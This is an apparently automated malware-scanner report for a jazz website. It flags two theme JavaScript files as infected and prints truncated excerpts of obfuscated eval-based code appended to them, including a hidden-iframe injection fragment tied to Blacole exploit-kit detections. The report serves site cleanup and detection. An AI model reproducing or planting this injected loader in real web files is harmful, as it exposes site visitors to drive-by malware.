New scan:

Malware Scanner report for urbansons.com

Malicious/Suspicious/Total urls checked
2/1/7
3 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.urbansons.com/
200 OK
Content-Length: 11195
Content-Type: text/html
suspicious
Page code contains blacklisted domain: 992621wl416w7ueenfhneukvae.hop.clickbank.net

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Smooth Jazz, Smooth Jazz Artists, Smooth Jazz Music</title>
<link rel="alternate" type="application/rss+xm
...[4303 bytes skipped]...

http://www.urbansons.com/wp-content/themes/simplex/includes/js/suckerfish.js
200 OK
Content-Length: 7830
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

sfHover = function() {
var sfEls = document.getElementById("page-list").getElementsByTagName("LI");
for (var i=0; i<sfEls.length; i++) {
sfEls[i].onmouseover=function() {
this.className+=" sfhover";
}
sfEls[i].onmouseout=function() {
this.className=this.className.replace(new RegExp(" sfhover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", sfHover);try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e
... 3054 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Decoded script:


function () {
var sfEls = document.getElementById("page-list").getElementsByTagName("LI");
for (var i = 0; i < sfEls.length; i++) {
sfEls[i].onmouseover = function () {this.className += " sfhover";};
sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");};
}
}
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
j%2
... 33369 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

K7AntiVirus
Trojan
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
NANO-Antivirus
Trojan.Script.Agent.xyevo
F-Prot
JS/IFrame.QW
AVG
HTML/Framer
Commtouch
JS/IFrame.QW

http://www.urbansons.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php
200 OK
Content-Length: 1526
Content-Type: application/x-javascript
clean
http://www.urbansons.com/wp-content/themes/simplex/js/jquery-1.2.6.min.js
200 OK
Content-Length: 63215
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var _jQuery=window.jQuery,_$=window.$;var jQuery=window.jQuery=window.$=function(selector,context){return new jQuery.fn.init(selector,context);};var quickExpr=/^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/,isSimple=/^.[^:#\[\.]*$/,undefined;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}if(typeof selector=="string"){var match=quickExpr.exec(selector);if(match&&(match[1]|
... 3078 bytes are skipped ...
50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}
/*qhk6sa6g1c*/

Antivirus reports:

AntiVir
JS/iFrame.BO.1
Avast
JS:Redirector-XU [Trj]
Ikarus
Trojan.Script
nProtect
Exploit.JS.Blacole.BQ
K7AntiVirus
Trojan
TrendMicro-HouseCall
JS_BLACOLE.JLNP
Emsisoft
Exploit.JS.Blacole.BQ (B)
Comodo
TrojWare.JS.Agent.AM
CAT-QuickHeal
JS/BlacoleRef.BV
McAfee-GW-Edition
JS/Exploit-Blacole.hd
DrWeb
JS.IFrame.278
TrendMicro
JS_BLACOLE.JLNP
Kaspersky
Trojan-Downloader.JS.Agent.gsv
Microsoft
Trojan:JS/BlacoleRef.BV
MicroWorld-eScan
Exploit.JS.Blacole.BQ
Fortinet
JS/Iframe.W!tr
PCTools
Malware.JS-Runfore
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.hd
NANO-Antivirus
Trojan.Script.Expack.uvpsi
ClamAV
JS.Trojan.Blacole-5
F-Secure
Exploit.JS.Blacole.BQ
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/IFrame.QW
AVG
HTML/Framer
Norman
Blacole.JE
Sophos
Mal/Iframe-AF
GData
Exploit.JS.Blacole.BQ
Symantec
JS.Runfore
Commtouch
JS/IFrame.QW
BitDefender
Exploit.JS.Blacole.BQ

http://ws.amazon.com/widgets/q?rt=tf_mfw&ServiceVersion=20070822&MarketPlace=US&ID=V20070822/US/urbsonsmojazb-20/8001/0d6663aa-232a-4809-95f8-ed54a2101ee9
200 OK
Content-Length: 3289
Content-Type: application/javascript
clean
http://cls.assoc-amazon.com/s/cls.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://cls.assoc-amazon.com/test404page.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: urbansons.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: urbansons.com
Referer: http://www.google.com/search?q=urbansons.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=urbansons.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://urbansons.com/

Result: urbansons.com is not infected or malware details are not published yet.